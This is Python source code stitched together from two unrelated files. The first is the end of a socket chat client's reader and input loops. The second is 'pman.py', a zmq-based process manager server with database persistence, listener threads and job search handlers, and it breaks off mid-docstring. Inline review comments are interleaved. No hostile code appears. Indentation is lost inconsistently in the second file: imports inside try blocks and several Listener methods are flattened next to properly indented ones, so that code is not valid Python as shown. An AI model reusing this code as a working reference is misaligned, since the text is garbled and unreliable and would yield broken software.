    """Reader loop: poll the non-blocking socket and print incoming messages.

    Runs forever in a background thread; exits the process when the server
    closes the connection or an unexpected socket error occurs.
    """
    while True:
        try:
            username_header = client_socket.recv(HEADER_LENGTH)
            if not len(username_header):
                # Zero-length read on a connected socket: orderly server shutdown.
                print("connection closed by the server")
                sys.exit()
            username_length = int(username_header.decode("utf-8").strip())
            username = client_socket.recv(username_length).decode("utf-8")
            message_header = client_socket.recv(HEADER_LENGTH)
            message_length = int(message_header.decode("utf-8").strip())
            message = client_socket.recv(message_length).decode("utf-8")
            content_show = f"{username} >>> {message}"
            print('', end='\r')
            print(content_show, end='\r\n')
        except IOError as e:
            # FIX: the original used 'or', which is always true on platforms
            # where EAGAIN != EWOULDBLOCK, turning the normal "no data yet"
            # case into a fatal exit. Bail out only when the error is NEITHER.
            if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:
                print('reading error', str(e))
                sys.exit()
            else:
                # check the server information every 1 second.
                time.sleep(1)
        except Exception as e:
            print("General error", str(e))
            #sys.exit()
# Start the background reader, then loop forever reading user input and
# sending it with the length-header framing.
threading.Thread(target=receive_thing).start()
while True:
    message = input(my_username + " > ")
    if message:
        message = message.encode("utf-8")
        # NOTE(review): the format spec '< {HEADER_LENGTH}' (space-sign before
        # the width) still yields a HEADER_LENGTH-wide field, but differs from
        # the username header format above — presumably unintentional; verify.
        message_header = f"{len(message) :< {HEADER_LENGTH}}".encode("utf-8")
        client_socket.send(message_header + message)
        #print(f"{my_username} > {message}" + " (sended) ")
|
pman.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import abc
import time
import os
import threading
import zmq
from webob import Response
import psutil
import queue
from functools import partial
import platform
import multiprocessing
import inspect
import json
import ast
import shutil
import datetime
import socket
import uuid
import pfmisc
# pman local dependencies
try:
from .openshiftmgr import *
except:
from openshiftmgr import *
try:
from .crunner import *
except:
from crunner import *
from pfmisc.Auth import Auth
from pfmisc.C_snode import *
from pfmisc._colors import Colors
import docker
import pudb
import pprint
from kubernetes.client.rest import ApiException
str_devNotes = """
08 June 2017
* NOTE: The zmq socket *always* sends back HTTP formatted headers around
the response string. The listening object (usually pfurl) should
*NOT* parse this with --httpResponseBodyParse!
10 May 2017
* Should methods in the listener be functors? Certain methods, such as
'run' and 'status' need specialized implementations based on a run
environment. This run environment is not known by the listener when
it starts, but can be specified at payload parsing by the process()
method. This, a method such as
t_run_process()
might need at arbitrary call time to be specialized to some external
condition set (say by running as a container). Naively, this can be
parsed in the message and thread redirected to
t_run_process_swarm()
for example.
Would a functor type approach be useful at all?
"""
class StoppableThread(threading.Thread):
    """Thread class with a stop() method. The thread itself has to check
    regularly for the stopped() condition."""

    def __init__(self, *args, **kwargs):
        super(StoppableThread, self).__init__(*args, **kwargs)
        # Event flag polled by the thread body to know when to exit.
        self._stopper = threading.Event()

    def stopit(self):
        """Request that the thread stop at its next check-point."""
        self._stopper.set()

    def stopped(self):
        """Return True once stopit() has been called."""
        # FIX: Event.isSet() is a deprecated camelCase alias; use is_set().
        return self._stopper.is_set()
class pman(object):
    """
    The server class for the pman (process manager) server

    Owns the zmq ROUTER/DEALER plumbing, a pool of Listener worker threads,
    a FileIO thread that periodically persists the in-memory C_stree "DB",
    and the DB itself.
    """
    # NOTE(review): Python-2 style metaclass declaration; has no effect
    # under Python 3.
    __metaclass__ = abc.ABCMeta

    def col2_print(self, str_left, str_right, level = 1):
        # Two-column aligned console output: left label (white), right value
        # (cyan), widths self.LC / self.RC.
        self.dp.qprint(Colors.WHITE +
                       ('%*s' % (self.LC, str_left)),
                       end = '',
                       level = level,
                       syslog = False)
        self.dp.qprint(Colors.CYAN +
                       ('%*s' % (self.RC, str_right)) + Colors.NO_COLOUR,
                       level = level,
                       syslog = False)

    def __init__(self, **kwargs):
        """
        Constructor

        Recognized kwargs (all optional): protocol, IP, port, raw, listeners,
        listenerSleep, DBsavePeriod, http, within, debugFile, debugToFile,
        DBpath, clearDB, desc, name, version, containerEnv, verbosity,
        b_tokenAuth, str_tokenPath.
        """
        self.within = None  # An encapsulating object

        # Description
        self.str_desc = ""
        self.str_name = ""
        self.str_version = ""
        self.__name__ = 'pman'

        # The main server function
        self.threaded_server = None

        # The listener thread array -- each element of this array is threaded listener
        # object
        self.l_listener = []
        self.listenerSleep = 0.1

        # The fileIO threaded object
        self.fileIO = None

        # DB
        self.b_clearDB = False
        self.str_DBpath = '/tmp/pman'
        self.ptree = C_stree()
        self.str_fileio = 'json'
        self.DBsavePeriod = 60

        # Comms
        self.str_protocol = "tcp"
        self.str_IP = "127.0.0.1"
        self.str_port = "5010"
        self.router_raw = 0
        self.listeners = 1
        self.b_http = False
        self.socket_front = None
        self.socket_back = None

        # Job info
        self.auid = ''
        self.jid = ''
        self.container_env = ''

        # Debug parameters
        self.str_debugFile = '/dev/null'
        self.b_debugToFile = True
        self.pp = pprint.PrettyPrinter(indent=4)
        self.verbosity = 1

        # Authentication parameters
        self.b_tokenAuth = False
        self.authModule = None

        for key,val in kwargs.items():
            if key == 'protocol': self.str_protocol = val
            if key == 'IP': self.str_IP = val
            if key == 'port': self.str_port = val
            if key == 'raw': self.router_raw = int(val)
            if key == 'listeners': self.listeners = int(val)
            if key == 'listenerSleep': self.listenerSleep = float(val)
            if key == 'DBsavePeriod': self.DBsavePeriod = int(val)
            if key == 'http': self.b_http = int(val)
            if key == 'within': self.within = val
            if key == 'debugFile': self.str_debugFile = val
            if key == 'debugToFile': self.b_debugToFile = val
            if key == 'DBpath': self.str_DBpath = val
            if key == 'clearDB': self.b_clearDB = val
            if key == 'desc': self.str_desc = val
            if key == 'name': self.str_name = val
            if key == 'version': self.str_version = val
            if key == 'containerEnv': self.container_env = val.lower()
            if key == 'verbosity': self.verbosity = int(val)
            if key == 'b_tokenAuth': self.b_tokenAuth = val
            if key == 'str_tokenPath':
                # NOTE(review): assumes 'b_tokenAuth' was seen earlier in the
                # kwargs iteration order than 'str_tokenPath' — verify callers.
                if self.b_tokenAuth:
                    self.authModule = Auth('socket', val)

        # Screen formatting
        self.LC = 30
        self.RC = 40
        self.dp = pfmisc.debug(
            verbosity = self.verbosity,
            debugFile = self.str_debugFile,
            debugToFile = self.b_debugToFile,
            within = self.__name__)

        # Optionally wipe any on-disk DB before loading.
        if self.b_clearDB and os.path.isdir(self.str_DBpath):
            shutil.rmtree(self.str_DBpath)

        self.dp.qprint(self.str_desc, level = 1)
        self.col2_print('Server is listening on',
                        '%s://%s:%s' % (self.str_protocol, self.str_IP, self.str_port))
        self.col2_print('Router raw mode', str(self.router_raw))
        self.col2_print('HTTP response back mode', str(self.b_http))
        self.col2_print('listener sleep', str(self.listenerSleep))

        # Create the main internal DB data structure/abstraction
        self.ptree = C_stree()

        # Read the DB from HDD
        self.DB_fileIO(cmd = 'load')

        # Setup zmq context
        self.zmq_context = zmq.Context()

    def DB_read(self, **kwargs):
        """
        Read the DB from filesystem. If DB does not exist on filesystem,
        create an empty DB and save to filesystem.
        """
        if os.path.isdir(self.str_DBpath):
            self.dp.qprint("Reading pman DB from disk...\n")
            self.ptree = C_stree.tree_load(
                pathDiskRoot = self.str_DBpath,
                loadJSON = True,
                loadPickle = False)
            self.dp.qprint("pman DB read from disk...\n")
            self.col2_print('Reading pman DB from disk:', 'OK')
        else:
            # No persisted DB: write the (empty) in-memory tree out as JSON.
            P = self.ptree
            # P.cd('/')
            # P.mkdir('proc')
            P.tree_save(
                startPath = '/',
                pathDiskRoot = self.str_DBpath,
                failOnDirExist = False,
                saveJSON = True,
                savePickle = False
            )
            self.col2_print('Reading pman DB from disk:',
                            'No DB found... creating empty default DB')
        self.dp.qprint(Colors.NO_COLOUR, end='')

    def DB_fileIO(self, **kwargs):
        """
        Process DB file IO requests. Typically these control the
        DB -- save or load.

        kwargs: cmd ('save' | 'load' | 'clear'), fileio ('json' | 'pickle'),
        dbpath (override disk root), db (override tree to operate on).
        """
        str_cmd = 'save'
        str_DBpath = self.str_DBpath
        tree_DB = self.ptree

        # Local helpers closing over str_DBpath; JSON and pickle variants.
        def loadFromDiskAsJSON():
            tree_DB = C_stree.tree_load(
                startPath = '/',
                pathDiskRoot = str_DBpath,
                failOnDirExist = False,
                loadJSON = True,
                loadPickle = False)
            return tree_DB

        def loadFromDiskAsPickle():
            tree_DB = C_stree.tree_load(
                startPath = '/',
                pathDiskRoot = str_DBpath,
                failOnDirExist = False,
                loadJSON = False,
                loadPickle = True)
            return tree_DB

        def saveToDiskAsJSON(tree_DB):
            tree_DB.tree_save(
                startPath = '/',
                pathDiskRoot = str_DBpath,
                failOnDirExist = False,
                saveJSON = True,
                savePickle = False)

        def saveToDiskAsPickle(tree_DB):
            tree_DB.tree_save(
                startPath = '/',
                pathDiskRoot = str_DBpath,
                failOnDirExist = False,
                saveJSON = False,
                savePickle = True)

        for k,v in kwargs.items():
            if k == 'cmd': str_cmd = v
            if k == 'fileio': self.str_fileio = v
            if k == 'dbpath': str_DBpath = v
            if k == 'db': tree_DB = v

        # self.dp.qprint('cmd = %s' % str_cmd)
        # self.dp.qprint('fileio = %s' % self.str_fileio)
        # self.dp.qprint('dbpath = %s' % str_DBpath)

        if str_cmd == 'clear':
            # This wipes the existing DB both in memory
            # and in disk storage.
            self.dp.qprint('Clearing internal memory DB...')
            tree_DB = C_stree()
            self.dp.qprint('Removing DB from persistent storage...')
            if os.path.isdir(str_DBpath):
                shutil.rmtree(str_DBpath, ignore_errors=True)
            self.dp.qprint('Saving empty DB to peristent storage')
            saveToDiskAsJSON(tree_DB)

        if str_cmd == 'save':
            # Persist by wiping the on-disk copy first, then re-serializing.
            if os.path.isdir(str_DBpath):
                shutil.rmtree(str_DBpath, ignore_errors=True)
            #print(tree_DB)
            if self.str_fileio == 'json': saveToDiskAsJSON(tree_DB)
            if self.str_fileio == 'pickle': saveToDiskAsPickle(tree_DB)

        if str_cmd == 'load':
            if os.path.isdir(str_DBpath):
                self.dp.qprint("Reading pman DB from disk...\n")
                if self.str_fileio == 'json': tree_DB = loadFromDiskAsJSON()
                if self.str_fileio == 'pickle': tree_DB = loadFromDiskAsPickle()
                self.dp.qprint("Pre-existing DB found at %s..." % str_DBpath)
                self.ptree = tree_DB
                self.ptree.cd('/')
                self.dp.qprint('DB root nodes:\n%s' % self.ptree.str_lsnode())
            else:
                # Nothing on disk yet: create the default empty DB.
                saveToDiskAsJSON(tree_DB)
                self.col2_print('Reading pman DB from disk:',
                                'No DB found... creating empty default DB')
                self.dp.qprint(Colors.NO_COLOUR, end='')
                self.ptree = tree_DB

    def thread_serve(self):
        """
        Serve the 'start' method in a thread.

        Blocks (polling once a second) until the StoppableThread is told to
        stop, then shuts down listeners, fileIO, and the zmq sockets.
        :return:
        """
        self.threaded_server = StoppableThread(target=self.start)
        self.threaded_server.start()

        while not self.threaded_server.stopped():
            time.sleep(1)

        # Stop the listeners...
        self.dp.qprint("setting b_stopThread on all listeners...")
        for i in range(0, self.listeners):
            self.dp.qprint("b_stopThread on listener %d and executing join()..." % i)
            self.l_listener[i].b_stopThread = True
            self.l_listener[i].join()

        # Stop the fileIO
        self.fileIO.b_stopThread = True
        self.dp.qprint("b_stopThread on fileIO executing join()...")
        self.fileIO.join()

        self.dp.qprint("Shutting down the zmq infrastructure...")
        try:
            self.dp.qprint('calling self.socket_back.close()')
            self.socket_back.close()
        except:
            self.dp.qprint('Caught exception in closing back socket')
        try:
            self.dp.qprint('calling self.socket_front.close()')
            self.socket_front.close()
        except zmq.error.ZMQError:
            self.dp.qprint('Caught exception in closing front socket...')
        self.dp.qprint('calling zmq_context.term()')
        # self.zmq_context.term()
        self.dp.qprint("calling join() on all this thread...")
        self.threaded_server.join()
        self.dp.qprint("shutdown successful...")

    def start(self):
        """
        Main execution.

        * Instantiate several 'listener' worker threads
        ** 'listener' threads are used to process input from external
           processes. In turn, 'listener' threads can thread out
           'crunner' threads that actually "run" the job.
        * Instantiate a job poller thread
        ** 'poller' examines the internal DB entries and regularly
           queries the system process table, tracking if jobs
           are still running.
        """
        self.dp.qprint('Starting %d Listener threads' % self.listeners)

        # Front facing socket to accept client connections.
        self.socket_front = self.zmq_context.socket(zmq.ROUTER)
        self.socket_front.router_raw = self.router_raw
        self.socket_front.setsockopt(zmq.LINGER, 1)
        self.socket_front.bind('%s://%s:%s' % (self.str_protocol,
                                               self.str_IP,
                                               self.str_port)
                               )

        # Backend socket to distribute work.
        self.socket_back = self.zmq_context.socket(zmq.DEALER)
        self.socket_back.setsockopt(zmq.LINGER, 1)
        self.socket_back.bind('inproc://backend')

        # Start the 'fileIO' thread
        self.fileIO = FileIO( DB = self.ptree,
                              timeout = self.DBsavePeriod,
                              within = self,
                              debugFile = self.str_debugFile,
                              verbosity = self.verbosity,
                              debugToFile = self.b_debugToFile)
        self.fileIO.start()

        # Start the 'listener' workers... keep track of each
        # listener instance so that we can selectively stop
        # them later.
        for i in range(0, self.listeners):
            self.l_listener.append(Listener(
                id = i,
                context = self.zmq_context,
                DB = self.ptree,
                DBpath = self.str_DBpath,
                http = self.b_http,
                containerEnv = self.container_env,
                within = self,
                listenerSleep = self.listenerSleep,
                verbosity = self.verbosity,
                debugToFile = self.b_debugToFile,
                debugFile = self.str_debugFile,
                b_tokenAuth = self.b_tokenAuth,
                authModule = self.authModule))
            self.l_listener[i].start()

        # Use built in queue device to distribute requests among workers.
        # What queue device does internally is,
        #   1. Read a client's socket ID and request.
        #   2. Send socket ID and request to a worker.
        #   3. Read a client's socket ID and result from a worker.
        #   4. Route result back to the client using socket ID.
        self.dp.qprint("*******before zmq.device!!!")
        try:
            # Blocks until the context/sockets are torn down at shutdown.
            zmq.device(zmq.QUEUE, self.socket_front, self.socket_back)
        except:
            self.dp.qprint('Hmmm... some error was caught on shutting down the zmq.device...')
        self.dp.qprint("*******after zmq.device!!!")

    def __iter__(self):
        # Iterating a pman yields a single ('Feed', <DB snapshot>) pair.
        yield('Feed', dict(self.ptree.snode_root))

    # @abc.abstractmethod
    # def create(self, **kwargs):
    #     """Create a new tree
    #
    #     """

    def __str__(self):
        """Print
        """
        return str(self.ptree.snode_root)

    @property
    def stree(self):
        """STree Getter"""
        return self.ptree

    @stree.setter
    def stree(self, value):
        """STree Setter"""
        self.ptree = value
class FileIO(threading.Thread):
    """
    A class that periodically saves the database from memory out to disk.

    The owning pman instance is passed as 'within'; every 'timeout' seconds
    the thread asks it to persist the DB via DB_fileIO(cmd='save').
    """
    def __init__(self, **kwargs):
        self.__name = "FileIO"
        self.b_http = False
        self.str_DBpath = "/tmp/pman"
        self.timeout = 60
        self.within = None
        # Cooperative shutdown flag, set by pman.thread_serve().
        self.b_stopThread = False
        self.verbosity = 1

        # Debug parameters
        self.str_debugFile = '/dev/null'
        self.b_debugToFile = True
        self.pp = pprint.PrettyPrinter(indent=4)

        for key,val in kwargs.items():
            if key == 'DB': self.ptree = val
            if key == 'DBpath': self.str_DBpath = val
            if key == 'timeout': self.timeout = val
            if key == 'within': self.within = val
            if key == 'debugFile': self.str_debugFile = val
            if key == 'debugToFile': self.b_debugToFile = val
            if key == 'verbosity': self.verbosity = int(val)

        self.dp = pfmisc.debug(
            verbosity = self.verbosity,
            debugFile = self.str_debugFile,
            debugToFile = self.b_debugToFile,
            within = self.__name)
        threading.Thread.__init__(self)

    def run(self):
        """ Main execution. """
        # Socket to communicate with front facing server.
        while not self.b_stopThread:
            # self.dp.qprint('Saving DB as type "%s" to "%s"...' % (
            #     self.within.str_fileio,
            #     self.within.str_DBpath
            # ))
            self.within.DB_fileIO(cmd = 'save')
            # self.dp.qprint('DB saved...')
            # Sleep in one-second slices so a stop request is noticed quickly.
            for second in range(0, self.timeout):
                if not self.b_stopThread:
                    time.sleep(1)
                else:
                    break
        self.dp.qprint('returning from FileIO run method...')
        # raise ValueError('FileIO thread terminated.')
class Listener(threading.Thread):
""" Listeners accept communication requests from front facing server.
Parse input text streams and act accordingly. """
    def __init__(self, **kwargs):
        """Constructor.

        kwargs: context (zmq context), id (worker index), DBpath, http,
        within (owning pman), debugFile, debugToFile, containerEnv,
        listenerSleep, verbosity, b_tokenAuth, authModule.
        """
        self.__name = "Listener"
        self.b_http = False
        self.poller = None
        self.str_DBpath = "/tmp/pman"
        self.str_jobRootDir = ''
        self.listenerSleep = 0.1
        self.verbosity = 1
        self.jid = ''
        self.auid = ''
        self.within = None
        # Cooperative shutdown flag, set by pman.thread_serve().
        self.b_stopThread = False
        self.openshiftmgr = None

        # Debug parameters
        self.str_debugFile = '/dev/null'
        self.b_debugToFile = True
        self.pp = pprint.PrettyPrinter(indent=4)

        for key,val in kwargs.items():
            if key == 'context': self.zmq_context = val
            if key == 'listenerSleep': self.listenerSleep = float(val)
            if key == 'id': self.worker_id = val
            # if key == 'DB': self.ptree = val
            if key == 'DBpath': self.str_DBpath = val
            if key == 'http': self.b_http = val
            if key == 'within': self.within = val
            if key == 'debugFile': self.str_debugFile = val
            if key == 'debugToFile': self.b_debugToFile = val
            if key == 'containerEnv': self.container_env = val
            if key == 'verbosity': self.verbosity = int(val)
            if key == 'b_tokenAuth': self.b_tokenAuth = val
            if key == 'authModule': self.authModule = val

        self.dp = pfmisc.debug(
            verbosity = self.verbosity,
            debugFile = self.str_debugFile,
            debugToFile = self.b_debugToFile,
            within = self.__name)
        threading.Thread.__init__(self)
        # logging.debug('leaving __init__')
def df_print(self, adict):
"""
Return a nicely formatted string representation of a dictionary
"""
return self.pp.pformat(adict).strip()
def run(self):
""" Main execution. """
# Socket to communicate with front facing server.
self.dp.qprint('starting...')
socket = self.zmq_context.socket(zmq.DEALER)
socket.connect('inproc://backend')
b_requestWaiting = False
resultFromProcessing = False
request = ""
client_id = -1
self.dp.qprint(Colors.BROWN + "Listener ID - %s: run() - Ready to serve..." % self.worker_id, level = 1)
while not self.b_stopThread:
# wait (non blocking) for input on socket
try:
client_id, request = socket.recv_multipart(flags = zmq.NOBLOCK)
self.dp.qprint('Received %s from client_id: %s' % (request, client_id))
b_requestWaiting = True
except zmq.Again as e:
if self.listenerSleep:
time.sleep(0.1)
else:
pass
if b_requestWaiting:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Received comms from client.' % (self.worker_id))
self.dp.qprint(Colors.BROWN + 'Client sends: %s' % (request))
resultFromProcessing = self.process(request)
if resultFromProcessing:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Sending response to client.' %
(self.worker_id))
self.dp.qprint('JSON formatted response:')
str_payload = json.dumps(resultFromProcessing, sort_keys=False, indent=4)
self.dp.qprint(Colors.LIGHT_CYAN + str_payload)
self.dp.qprint(Colors.BROWN + 'len = %d chars' % len(str_payload))
socket.send(client_id, zmq.SNDMORE)
if self.b_http:
str_contentType = "application/html"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = "%s%s" % (str_HTTPpre, str(res))
str_res = str_res.replace("UTF-8", "UTF-8\nAccess-Control-Allow-Origin: *")
self.dp.qprint('HTML response')
self.dp.qprint(str_res.encode())
socket.send(str_res.encode())
else:
str_contentType = "application/json"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = '%s%s' % (str_HTTPpre, (res))
self.dp.qprint(str_res)
socket.send_string(str_res)
b_requestWaiting = False
self.dp.qprint('Listener ID - %s: Returning from run()...' % self.worker_id)
# raise('Listener ID - %s: Thread terminated' % self.worker_id)
return True
    def t_search_process(self, *args, **kwargs):
        """
        Search

        Walk every root node of the internal DB tree and collect the nodes
        whose file <meta.key> has contents equal to <meta.value>. Optional
        meta keys 'path', 'job'/'field'/'when' reshape the returned DB path.

        :param args:
        :param kwargs: 'request' -- the parsed client request dictionary
        :return: {"d_ret": <hit-index -> DB_get result>, "status": hits > 0}
        """
        self.dp.qprint("In search process...")
        d_request = {}
        d_ret = {}
        hits = 0
        for k, v in kwargs.items():
            if k == 'request': d_request = v
        d_meta = d_request['meta']

        # Optional meta specifiers, each with a presence flag and value.
        b_pathSpec = False
        str_path = ""
        if 'path' in d_meta:
            b_pathSpec = True
            str_path = d_meta['path']

        b_jobSpec = False
        str_jobSpec = ""
        if 'job' in d_meta:
            b_jobSpec = True
            str_jobSpec = d_meta['job']

        b_fieldSpec = False
        str_fieldSpec = ""
        if 'field' in d_meta:
            b_fieldSpec = True
            str_fieldSpec = d_meta['field']

        b_whenSpec = False
        str_whenSpec = "end"
        if 'when' in d_meta:
            b_whenSpec = True
            str_whenSpec = d_meta['when']

        self.dp.qprint(d_meta)
        self.dp.qprint(b_pathSpec)

        str_fileName = d_meta['key']
        str_target = d_meta['value']

        p = self.within.ptree
        # Remember the tree's cwd so it can be restored after the walk.
        str_origDir = p.cwd()
        str_pathOrig = str_path
        for r in self.within.ptree.lstr_lsnode('/'):
            if p.cd('/' + r)['status']:
                str_val = p.cat(str_fileName)
                if str_val == str_target:
                    if not b_pathSpec:
                        str_path = '/api/v1/' + r + '/' + str_fileName
                    else:
                        str_path = '/api/v1/' + r + str_pathOrig
                        if str_path[-1] == '/': str_path = str_path[:-1]
                    if b_jobSpec:
                        # Job-specific lookup overrides any path built above.
                        str_path = '/api/v1/' + r + '/' + \
                                   str_whenSpec + '/' + \
                                   str_jobSpec + '/' + \
                                   '%sInfo' % str_whenSpec + '/' + \
                                   str_jobSpec + '/' + \
                                   str_fieldSpec
                    d_ret[str(hits)] = {}
                    d_ret[str(hits)] = self.DB_get(path = str_path)
                    hits += 1
        p.cd(str_origDir)
        return {"d_ret": d_ret,
                "status": bool(hits)}
    def t_info_process(self, *args, **kwargs):
        """
        Check if the job corresponding to the search pattern is "done".

        Runs a search first, then for every hit fetches the job's
        startInfo/endInfo subtrees into d_ret['<n>.0'] / d_ret['<n>.1'].

        :param args:
        :param kwargs: 'request' -- the parsed client request dictionary
        :return: {"d_ret": ..., "status": True when at least one job matched}
        """
        self.dp.qprint("In info process...")
        d_request = {}
        d_ret = {}
        b_status = False
        hits = 0
        for k, v in kwargs.items():
            if k == 'request': d_request = v
        d_search = self.t_search_process(request = d_request)['d_ret']
        p = self.within.ptree
        for j in d_search.keys():
            d_j = d_search[j]
            for job in d_j.keys():
                str_pathStart = '/api/v1/' + job + '/startInfo'
                str_pathEnd = '/api/v1/' + job + '/endInfo'
                d_ret[str(hits)+'.0'] = {}
                d_ret[str(hits)+'.0'] = self.DB_get(path = str_pathStart)
                d_ret[str(hits)+'.1'] = {}
                d_ret[str(hits)+'.1'] = self.DB_get(path = str_pathEnd)
                hits += 1
        if not hits:
            # Sentinel structure signalling "no matching job".
            d_ret = {
                "-1": {
                    "noJobFound": {
                        "endInfo": {"allJobsDone": None}
                    }
                }
            }
        else:
            b_status = True
        return {"d_ret": d_ret,
                "status": b_status}
def t_quit_process(self, *args, **kwargs):
"""
Process the 'quit' POST directive. This might appear counter-intuitive
at first glance since the 'get' is the result of a REST POST, but is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'saveDB' in d_meta.keys():
self.dp.qprint("Saving DB...")
self.within.DB_fileIO(cmd = 'save')
self.dp.qprint('calling threaded_server.stop()')
self.within.threaded_server.stopit()
self.dp.qprint('called threaded_server.stop()')
return {'d_ret': d_ret,
'status': True}
def t_get_process(self, *args, **kwargs):
"""
Process the 'get' POST directive. This might appear counter-intuitive
at first glance since the 'get' is the result of a REST POST, but is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
str_path = '/api/v1' + d_meta['path']
d_ret = self.DB_get(path = str_path)
return {'d_ret': d_ret,
'status': True}
def t_DBctl_process(self, *args, **kwargs):
"""
Entry point for internal DB control processing.
"""
tree_DB = self.within.ptree
d_request = {}
d_ret = {}
b_status = False
str_fileio = self.within.str_fileio
str_DBpath = self.within.str_DBpath
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'do' in d_meta: str_do = d_meta['do']
if 'dbpath' in d_meta: str_DBpath = d_meta['dbpath']
if 'fileio' in d_meta: str_fileio = d_meta['fileio']
self.within.DB_fileIO(
cmd = str_do,
fileio = str_fileio,
dbpath = str_DBpath,
db = tree_DB
)
# str_path = '/api/v1' + str_DBpath
d_ret = self.DB_get(path = str_DBpath)
return {'d_ret': d_ret,
'status': True}
    def t_fileiosetup_process(self, *args, **kwargs):
        """
        Setup a thread with a socket listener. Return listener address to client

        Binds an HTTP file-IO server on the pman port offset by this worker's
        id, then either serves forever or handles a single request depending
        on meta['serveforever'].
        """
        self.dp.qprint("In fileiosetup process...")
        d_ret = {}
        for k, v in kwargs.items():
            if k == 'request': d_request = v
        d_meta = d_request['meta']
        d_ret['fileioIP'] = "%s" % self.within.str_IP
        # Each worker listens on its own port: base port + worker_id.
        d_ret['fileioport'] = "%s" % (int(self.within.str_port) + self.worker_id)
        d_ret['serveforever'] = d_meta['serveforever']
        d_args = {
            'ip': d_ret['fileioIP'],
            'port': d_ret['fileioport']
        }
        # NOTE(review): ThreadedHTTPServer/StoreHandler are not defined in this
        # file's visible portion — presumably from the 'crunner' star import;
        # confirm before modifying.
        server = ThreadedHTTPServer((d_args['ip'], int(d_args['port'])), StoreHandler)
        server.setup(args = d_args)
        self.dp.qprint("serveforever = %d" % d_meta['serveforever'])
        b_serveforever = False
        if 'serveforever' in d_meta.keys():
            b_serveforever = d_meta['serveforever']
        if b_serveforever:
            self.dp.qprint("about to serve_forever()...")
            server.serve_forever()
        else:
            self.dp.qprint("about to handle_request()...")
            server.handle_request()
        return {"d_ret": d_ret,
                "status": True}
    def job_state(self, *args, **kwargs):
        """
        Return a structure that can be further processed to determine the job's state.

        For every job matched by the embedded search, collects the start
        triggers, the end returncodes, and (when present) the 'container'
        subtree, keyed '<n>.start' / '<n>.end' / '<n>.container'.

        :param args:
        :param kwargs: 'request' -- the parsed client request dictionary
        :return: {"hits": ..., "d_ret": ..., "status": hits > 0}
        """
        self.dp.qprint("In job_state()...")
        d_request = {}
        d_ret = {}
        b_status = False
        b_container = False
        hits = 0
        for k, v in kwargs.items():
            if k == 'request': d_request = v
        d_search = self.t_search_process(request = d_request)['d_ret']
        p = self.within.ptree
        # Scratch trees rebuilt from the start/end dictionaries of each job.
        Ts = C_stree()
        Te = C_stree()
        for j in d_search.keys():
            d_j = d_search[j]
            for job in d_j.keys():
                str_pathStart = '/api/v1/' + job + '/start'
                str_pathEnd = '/api/v1/' + job + '/end'
                d_start = self.DB_get(path = str_pathStart)
                d_end = self.DB_get(path = str_pathEnd)
                Ts.initFromDict(d_start)
                Te.initFromDict(d_end)
                self.dp.qprint("Ts.cwd = %s " % Ts.cwd())
                self.dp.qprint(Ts)
                self.dp.qprint("Te.cwd = %s " % Te.cwd())
                self.dp.qprint(Te)

                # Sub-job epoch indices under <job>/start, numerically sorted.
                l_subJobsStart = []
                if Ts.cd('/%s/start' % job)['status']:
                    l_subJobsStart = Ts.lstr_lsnode()
                    l_subJobsStart = list(map(int, l_subJobsStart))
                    l_subJobsStart.sort()
                self.dp.qprint("l_subJobsStart (pre) = %s" % l_subJobsStart)
                if len(l_subJobsStart) > 1: l_subJobsStart = l_subJobsStart[:-1]

                l_subJobsEnd = []
                if Te.cd('/%s/end' % job)['status']:
                    l_subJobsEnd = Te.lstr_lsnode()
                    l_subJobsEnd = list(map(int, l_subJobsEnd))
                    l_subJobsEnd.sort()
                self.dp.qprint("l_subJobsEnd (pre) = %s " % l_subJobsEnd)
                if len(l_subJobsEnd) > 1: l_subJobsEnd = l_subJobsEnd[:-1]

                self.dp.qprint("l_subJobsStart (post) = %s" % l_subJobsStart)
                self.dp.qprint("l_subJobsEnd (post) = %s" % l_subJobsEnd)

                # NOTE(review): the loop below uses list *values* as indices
                # into the same list — this only stays in bounds when the
                # epoch indices are contiguous from 0; verify that invariant.
                for j in l_subJobsStart:
                    l_subJobsStart[j] = Ts.cat('/%s/start/%d/startInfo/%d/startTrigger' % \
                                        (job, j, j))

                # jobsEnd behaviour can be slightly different to the jobStart, particularly if
                # the job being executed is killed -- sometimes recording the "death" event of
                # the job does not happen and the job indexing ends up missing several epochs:
                #
                #       l_subJobsStart (pre) = [0, 1, 2, 3, 4]
                #       l_subJobsEnd   (pre) = [0, 1, 3, 4]
                #
                # to assure correct returncode lookup, we always parse the latest job epoch.
                latestJob = 0
                if len(l_subJobsEnd):
                    latestJob = l_subJobsEnd[-1]
                for j in list(range(0, latestJob+1)):
                    l_subJobsEnd[j] = Te.cat('/%s/end/%s/endInfo/%d/returncode' % (job, latestJob, j))

                T_container = False
                if p.exists('container', path = '/%s' % job):
                    T_container = C_stree()
                    p.copy(startPath = '/%s/container' % (job), destination = T_container)
                    d_ret[str(hits)+'.container'] = {"jobRoot": job, "tree": dict(T_container.snode_root)}
                else:
                    d_ret[str(hits)+'.container'] = {"jobRoot": job, "tree": None}

                d_ret[str(hits)+'.start'] = {"jobRoot": job, "startTrigger": l_subJobsStart}
                d_ret[str(hits)+'.end'] = {"jobRoot": job, "returncode": l_subJobsEnd}
                hits += 1
        if not hits:
            # Sentinel entries for "no matching job".
            d_ret['-1.start'] = {"jobRoot": None, "startTrigger": None}
            d_ret['-1.end'] = {"jobRoot": None, "returncode": None}
            d_ret['-1.container'] = {"jobRoot": None, "tree": None}
        else:
            b_status = True
        return {"hits": hits,
                "d_ret": d_ret,
                "status": b_status}
def t_done_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In done process...")
return self.job_state(*args, **kwargs)
    def t_status_process(self, *args, **kwargs):
        """
        This method is the main (threaded) entry point for returning
